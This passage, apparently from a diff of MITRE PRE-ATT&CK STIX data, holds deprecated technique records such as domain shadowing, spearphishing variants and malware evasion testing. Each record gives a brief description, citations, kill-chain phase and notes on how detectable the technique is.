They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. Acquiring a certificate for a domain name similar to one that is expected to be trusted may allow an adversary to trick a user in to trusting the domain (e.g., vvachovia instead of [Wachovia](https://www.wellsfargo.com/about/corporate/wachovia) -- homoglyphs). (Citation: SubvertSSL) (Citation: PaypalScam)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1337", + "external_id": "T1337" + }, + { + "source_name": "SubvertSSL", + "description": "Ryan Singel. (2010, March 24). Law Enforcement Appliance Subverts SSL. Retrieved March 2, 2017." + }, + { + "source_name": "PaypalScam", + "description": "Bob Sullivan. (2000, July 24). PayPal alert! Beware the 'PaypaI' scam. 
Retrieved March 2, 2017.", + "url": "https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1114", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "SSL certificates are readily available at little to no cost.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Defender can monitor for domains similar to popular sites (possibly leverage [https://www.alexa.com Alexa] top ''N'' lists as starting point).", + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--54a42187-a20c-4e4e-ba31-8d15c9e1f57f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "SSL certificate acquisition for trust breaking", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1338).\n\nFake certificates can be acquired by legal process or coercion. Or, an adversary can trick a Certificate Authority into issuing a certificate. These fake certificates can be used as a part of Man-in-the-Middle attacks. (Citation: SubvertSSL)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1338", + "external_id": "T1338" + }, + { + "source_name": "SubvertSSL", + "description": "Ryan Singel. (2010, March 24). 
Law Enforcement Appliance Subverts SSL. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "The certificate authority who is hacked cannot easily see they've been compromised, but [https://www.google.com Google] has caught on to this occurring in previous attacks such as DigiNotarDigiNotar2016 and [https://www.verisign.com Verisign].", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "One example of it occurring in the real world is the DigiNotarDigiNotar2016 case. To be able to do this usually requires sophisticated skills and is traditionally done by a nation state to spy on its citizens.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1115", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--cc0faf66-4df2-4328-9c9c-b0ca5de915ad", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Secure and protect infrastructure", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1317).\n\nAn adversary may secure and protect their infrastructure just as defenders do. This could include the use of VPNs, security software, logging and monitoring, passwords, or other defensive measures. 
(Citation: KrebsTerracottaVPN)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1317", + "external_id": "T1317" + }, + { + "source_name": "KrebsTerracottaVPN", + "description": "Brian Krebs. (2014, August 4). Chinese VPN Service as Attack Platform?. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Indistinguishable from standard security practices employed by legitimate operators.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary benefits from our own advances, techniques, and software when securing and protecting their own development infrastructure.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1094", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--3f157dee-74f0-41fc-801e-f837b8985b0a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Shadow DNS", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1340).\n\nThe process of gathering domain account credentials in order to silently create subdomains pointed at malicious servers without tipping off the actual owner. 
(Citation: CiscoAngler) (Citation: ProofpointDomainShadowing)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1340", + "external_id": "T1340" + }, + { + "source_name": "CiscoAngler", + "description": "Nick Biasini. (2015, March 3). Threat Spotlight: Angler Lurking in the Domain Shadows. Retrieved March 6, 2017.", + "url": "https://blogs.cisco.com/security/talos/angler-domain-shadowing" + }, + { + "source_name": "ProofpointDomainShadowing", + "description": "Proofpoint Staff. (2015, December 15). The shadow knows: Malvertising campaigns use domain shadowing to pull in Angler EK. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1117", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "To successfully conduct this attack, an adversary usually phishes the individual behind the domain registrant account, logs in with credentials, and creates a large amount of subdomains.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Detection of this technique requires individuals to monitor their domain registrant accounts routinely. 
In addition, defenders have had success with blacklisting sites or IP addresses, but an adversary can defeat this by rotating either the subdomains or the IP addresses associated with the campaign.", + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--e24a9f99-cb76-42a3-a50b-464668773e97", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Spear phishing messages with malicious attachments", + "description": "**This technique has been deprecated. Please use [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).**\n\nEmails with malicious attachments are designed to get a user to open/execute the attachment in order to deliver malware payloads. (Citation: APT1)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1367", + "url": "https://attack.mitre.org/techniques/T1367" + }, + { + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017.", + "source_name": "APT1" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:25:35.837Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1144", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Sending the emails is the simple part, ensuring they make it to the target (e.g., not being filtered) may be challenging. 
Over time, an adversary refines their techniques to minimize detection by making their emails seem legitimate in structure and content.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Many technologies exist to scan content and/or emulate a workstation prior to the target receiving and executing the attachment (detonation chambers) in order to reduce malicious emails and attachments being delivered to the intended target. However, encryption continues to be a stumbling block. In addition, there are a variety of commercial technologies available that enable users to screen for phishing messages and which are designed to enhance email security.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1369", + "url": "https://attack.mitre.org/techniques/T1369" + }, + { + "description": "Nick Johnston. (2014, March 13). Google Docs Users Targeted by Sophisticated Phishing Scam. Retrieved March 29, 2017.", + "source_name": "GoogleDrive Phishing" + }, + { + "description": "Bob Griffin. (2015, May 16). THE ON-GOING THREAT OF SOCIAL ENGINEERING. Retrieved March 9, 2017.", + "source_name": "RSASEThreat" + } + ], + "description": "**This technique has been deprecated. Please use [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002).**\n\nEmails with malicious links are designed to get a user to click on the link in order to deliver malware payloads. 
(Citation: GoogleDrive Phishing) (Citation: RSASEThreat)", + "name": "Spear phishing messages with malicious links", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--489a7797-01c3-4706-8cd1-ec56a9db3adc", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:25:58.783Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses_explanation": "Defenders can implement mechanisms to analyze links and identify levels of concerns. However, the adversary has the advantage of creating new links or finding ways to obfuscate the link so that common detection lists can not identify it. Detection of a malicious link could be identified once the file has been downloaded.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Sending emails is trivial and expected. The adversary needs to ensure links don't get tampered, removed, or flagged as a previously black-listed site.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1146" + }, + { + "id": "attack-pattern--2fc04aa5-48c1-49ec-919a-b88241ef1d17", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Spear phishing messages with text only", + "description": "**This technique has been deprecated. Please use [Phishing](https://attack.mitre.org/techniques/T1566) where appropriate.**\n\nEmails with text only phishing messages do not contain any attachments or links to websites. They are designed to get a user to take a follow on action such as calling a phone number or wiring money. They can also be used to elicit an email response to confirm existence of an account or user. 
(Citation: Paypal Phone Scam)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1368", + "url": "https://attack.mitre.org/techniques/T1368" + }, + { + "description": "Sophos Labs. (2006, July 7). PayPal phone phish scam uses voice recording to steal money. Retrieved March 29, 2017.", + "source_name": "Paypal Phone Scam" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:26:25.555Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1145", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Sending messages with text only should be accepted in most cases (e.g., not being filtered based on source, content).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "End user training and awareness is the primary defense for flagging a plain text email so the end user does not respond or take any requested action (e.g., calling a designated number).", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--b182f29c-2505-4b32-a000-0440ef189f59", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Spearphishing for Information", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1397).\n\nSpearphishing for information is a specific variant of spearphishing. 
Spearphishing for information is different from other forms of spearphishing in that it it doesn't leverage malicious code. All forms of spearphishing are elctronically delivered social engineering targeted at a specific individual, company, or industry. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials, without involving malicious code. Spearphishing for information frequently involves masquerading as a source with a reason to collect information (such as a system administrator or a bank) and providing a user with a website link to visit. The given website often closely resembles a legitimate site in appearance and has a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Spearphishing for information may also try to obtain information directly through the exchange of emails, instant messengers or other electronic conversation means. (Citation: ATTACKREF GRIZZLY STEPPE JAR)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1397", + "external_id": "T1397" + }, + { + "source_name": "ATTACKREF GRIZZLY STEPPE JAR", + "description": "Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE \u2013 Russian Malicious Cyber Activity. Retrieved January 11, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2018-04-18T17:59:24.739Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1174", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Sending emails is trivial, and, over time, an adversary can refine their technique to minimize detection by making their emails seem legitimate in structure and content.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Depending on the specific method of phishing, the detections can vary. For emails, filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. When it comes to following links, network intrusion detection systems (NIDS), firewalls, removing links, exploding shortened links, proxy monitoring, blocking uncategorized sites, and site reputation based filtering can all provide detection opportunities.", + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--03da0598-ed46-4a73-bf43-0313b3522400", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Submit KITs, KIQs, and intelligence requirements", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1237).\n\nOnce they have been created, intelligence requirements, Key Intelligence Topics (KITs), and Key Intelligence Questions (KIQs) are submitted into a central management system. 
(Citation: ICD204) (Citation: KIT-Herring)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1237", + "external_id": "T1237" + }, + { + "source_name": "ICD204", + "description": "Office of the Director of National Intelligence. (2015, January 02). Retrieved March 5, 2017." + }, + { + "source_name": "KIT-Herring", + "description": "Jan P. Herring. (1999). Key Intelligence Topics: A Process to Identify and Define Intelligence Needs. Retrieved May 19, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1014", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-direction" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--72923cae-6c8c-4da2-8f48-b73389529c25", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Targeted client-side exploitation", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nA technique used to compromise a specific group of end users by taking advantage of flaws in client-side applications. For example, infecting websites that members of a targeted group are known to visit with the goal to infect a targeted user's computer. 
(Citation: RSASEThreat) (Citation: WikiStagefright) (Citation: ForbesSecurityWeek) (Citation: StrongPity-waterhole)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1371", + "url": "https://attack.mitre.org/techniques/T1371" + }, + { + "description": "Bob Griffin. (2015, May 16). THE ON-GOING THREAT OF SOCIAL ENGINEERING. Retrieved March 9, 2017.", + "source_name": "RSASEThreat" + }, + { + "description": "Wikipedia contributors. (2017, March 8). Stagefright (bug). Retrieved March 9, 2017.", + "source_name": "WikiStagefright" + }, + { + "description": "Fahmida Y. Rashid. (2015, February 11). Chinese Attackers Hacked Forbes Website in Watering Hole Attack: Security Firms. Retrieved March 7, 2017.", + "source_name": "ForbesSecurityWeek" + }, + { + "description": "Kurt Baumgartner. (2016, October 3). On the StrongPity Waterhole Attacks Targeting Italian and Belgian Encryption Users. Retrieved May 9, 2017.", + "source_name": "StrongPity-waterhole" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:26:52.970Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1148", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Commonly executed technique to place an exploit on an often widely used public web site intended for driveby delivery. The additional challenge is the reduced set of options for web sites to compromise since the set is reduced to those often visited by targets of interest.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Defensive technologies exist to scan web content before delivery to the requested end user. 
However, this is not foolproof as some sites encrypt web communications and the adversary constantly moves to sites not previously flagged as malicious thus defeating this defense. Host-based defenses can also aid in detection/mitigation as well as detection by the web site that got compromised. The added challenge for a conditional watering hole is the reduced scope and likely reduced ability to detect or be informed. Determining deltas in content (e.g., differences files type/size/number/hashes) downloaded could also aid in detection.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + }, + { + "id": "attack-pattern--eb517589-eefc-480e-b8e3-7a8b1066f6f1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Targeted social media phishing", + "description": "**This technique has been deprecated. Please use [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003).**\n\nSending messages through social media platforms to individuals identified as a target. These messages may include malicious attachments or links to malicious sites or they may be designed to establish communications for future actions. (Citation: APT1) (Citation: Nemucod Facebook)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1366", + "url": "https://attack.mitre.org/techniques/T1366" + }, + { + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017.", + "source_name": "APT1" + }, + { + "description": "Bart Blaze. (2016, November 20). Nemucod downloader spreading via Facebook. 
Retrieved March 28, 2017.", + "source_name": "Nemucod Facebook" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:27:43.972Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1143", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Sending messages to individuals identified as a target follows normal tradecraft for using social media.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Extremely hard to identify (in the launch phase) what message via social media is hostile versus what is not. Increased use of encrypted communications increases the difficulty average defender's have in detecting use of this technique.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--b93bd611-da4e-4c84-a40f-325b712bed67", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Task requirements", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1240).\n\nOnce divided into the most granular parts, analysts work with collection managers to task the collection management system with requirements and sub-requirements. (Citation: Heffter) (Citation: JP2-01)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1240", + "external_id": "T1240" + }, + { + "source_name": "Heffter", + "description": "Clyde R. Heffter. (2011, August 4). 
A Fresh Look at Collection Requirements. Retrieved March 2, 2017." + }, + { + "source_name": "JP2-01", + "description": "Joint Chiefs of Staff. (2012, January 05). Joint and National Intelligence Support to Military Operations. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1017", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-direction" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--c9e85b80-39e8-42df-b275-86a2afcea9e8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test ability to evade automated mobile application security analysis performed by app stores", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1393).\n\nMany mobile devices are configured to only allow applications to be installed from the mainstream vendor app stores (e.g., Apple App Store and Google Play Store). 
An adversary can submit multiple code samples to these stores deliberately designed to probe the stores' security analysis capabilities, with the goal of determining effective techniques to place malicious applications in the stores that could then be delivered to targeted devices. (Citation: Android Bouncer) (Citation: Adventures in BouncerLand) (Citation: Jekyll on iOS) (Citation: Fruit vs Zombies)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1393", + "external_id": "T1393" + }, + { + "source_name": "Android Bouncer", + "description": "Jon Oberheide and Charlie Miller. (2012). DISSECTING THE ANDROID BOUNCER. Retrieved April 12, 2017." + }, + { + "source_name": "Adventures in BouncerLand", + "description": "Nicholas J. Percoco and Sean Schulte. (2012). Adventures in BouncerLand. Retrieved April 12, 2017." + }, + { + "source_name": "Jekyll on iOS", + "description": "Tielei Wang, Kangjie Lu, Long Lu, Simon Chung, and Wenke Lee. (2013). Jekyll on iOS: When Benign Apps Become Evil. Retrieved April 12, 2017." + }, + { + "source_name": "Fruit vs Zombies", + "description": "Claud Xiao. (2016). Fruit vs Zombies: Defeat Non-jailbroken iOS Malware. Retrieved April 12, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "The app store operators (e.g., Apple and Google) may detect the attempts, but it would not be observable to those being attacked.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "An adversary can submit code remotely using throwaway accounts, although a registration fee may need to be paid for each new account (e.g., $99 for Apple and $25 for Google Play Store).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1170", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "test-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--0649fc36-72a0-40a0-a2f9-3fc7e3231ad6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test callback functionality", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1356).\n\nCallbacks are malware communications seeking instructions. An adversary will test their malware to ensure the appropriate instructions are conveyed and the callback software can be reached. (Citation: LeeBeaconing)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1356", + "external_id": "T1356" + }, + { + "source_name": "LeeBeaconing", + "description": "Tony Lee. (2012, December 11). Testing Your Defenses - Beaconing. Retrieved March 9, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary controls the test and defender likely has no visibility.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary controls or acquires all pieces of infrastructure and can test outside of defender's visibility.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1133", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "test-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--e042a41b-5ecf-4f3a-8f1f-1b528c534772", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test malware in various execution environments", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1357).\n\nMalware may perform differently on different platforms (computer vs handheld) and different operating systems ([Ubuntu](http://www.ubuntu.com) vs [OS X](http://www.apple.com/osx)), and versions ([Windows](http://windows.microsoft.com) 7 vs 10) so malicious actors will test their malware in the environment(s) where they most expect it to be executed. (Citation: BypassMalwareDefense)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1357", + "external_id": "T1357" + }, + { + "source_name": "BypassMalwareDefense", + "description": "Morton Christiansen. (2010, May 7). Bypassing Malware Defenses. 
Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary controls the test and defender likely has no visibility.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary can simulate most environments (e.g., variable operating systems, patch levels, application versions) with details available from other techniques.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1134", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "test-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--8b57a8f1-9cbc-4b95-b162-cc2a1add94f2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test malware to evade detection", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1359).\n\nAn adversary can run their code on systems with cyber security protections, such as antivirus products, in place to see if their code is detected. They can also test their malware on freely available public services. (Citation: MalwareQAZirtest)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1359", + "external_id": "T1359" + }, + { + "source_name": "MalwareQAZirtest", + "description": "Damballa Day Before Zero Blog. (2009, December 17). Malware QA and Exploit Testing Services \u2013 Virtest.com. Retrieved March 9, 2017." 
